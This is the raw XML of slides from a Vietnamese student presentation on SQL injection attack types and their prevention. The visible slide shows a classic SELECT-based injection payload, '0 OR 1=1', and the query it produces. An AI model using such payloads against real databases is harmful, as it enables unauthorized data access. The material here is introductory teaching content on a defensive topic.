                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ID: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kẻ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tấn công có thể thay thế một ID hợp lệ bằng cách gán ID cho một giá trị khác, và từ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>đó,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>khởi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>đầu cho một cuộc tấn công bất hợp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pháp.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> - V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>í dụ như: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0 OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Câu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>truy vấn SQL lúc này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>* FROM T_NEWS WHERE NEWS_ID=0 or 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947615" y="169491"/>
            <a:ext cx="7262798" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công sử dụng câu lệnh SELECT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3038418" y="1229649"/>
            <a:ext cx="5513911" cy="1804408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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144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a:noFill/>
        </a:ln>
      </a:spPr>
      <a:bodyPr anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr" eaLnBrk="0" hangingPunct="0">
          <a:defRPr sz="105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1910</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>174</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Wingdings</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Segoe UI Historic</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Oswald</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Quince template</vt:lpstr>
      <vt:lpstr>TÌM HIỂU CÁC DẠNG TẤN CÔNG SQL INJECTION  XÂY DỰNG VÀ DEMO CÁC KỊCH BẢN TẤN CÔNG SQL INJECTION</vt:lpstr>
      <vt:lpstr>NỘI DUNG BÁO CÁO:</vt:lpstr>
      <vt:lpstr>PHẦN I: Tổng quan </vt:lpstr>
      <vt:lpstr>PHẦN I: Tổng quan</vt:lpstr>
      <vt:lpstr>PHẦN II: Các dạng tấn công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III: Cách phòng chống </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dc:creator>Hoàng Nhã</dc:creator>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-20T12:00:31Z</dcterms:modified>
</cp:coreProperties>
</file>